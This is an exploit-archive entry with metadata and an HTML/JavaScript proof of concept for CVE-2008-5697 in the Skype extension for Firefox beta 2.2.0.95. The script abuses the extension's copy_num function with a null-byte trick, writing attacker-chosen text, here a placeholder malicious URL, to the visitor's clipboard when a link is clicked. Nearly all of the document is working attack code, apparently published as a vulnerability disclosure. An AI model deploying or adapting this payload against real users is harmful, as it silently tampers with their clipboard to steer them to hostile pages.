Skype Extension for Firefox Beta 2.2.0.95 - Clipboard Writing

Author: irk4z
type: remote
platform: windows
port: 
date_added: 2008-10-06  
date_updated: 2017-10-07  
verified: 1  
codes: OSVDB-51478;CVE-2008-5697  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6690.html  
<!---------------------------------------------------------------------------
 Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC
 download: https://developer.skype.com/SkypeToolbars

 Author: irk4z[at]yahoo.pl
 homepage: http://irk4z.wordpress.com/

 greets: all friends
---------------------------------------------------------------------------->
<a href="#" onclick="check_it();" >test it!</a>


<script type="text/javascript">

function copy_to_clipboard( text ){
	if (skype_tool) {
		var copy_it = text + '\0+'; //use null byte to copy value, because '+' char must be in string
		skype_tool.copy_num( copy_it );
	}
}

function check_it(){
	//copy_to_clipboard('malicious text!!!!!!!!!!!\n\n\n!!');
	//copy_to_clipboard('http://irk4z.wordpress.com/');
	copy_to_clipboard('http://malicious.link.to.bad.page/');
	alert('Done! Check your clipboard!');
}

</script>

# milw0rm.com [2008-10-07]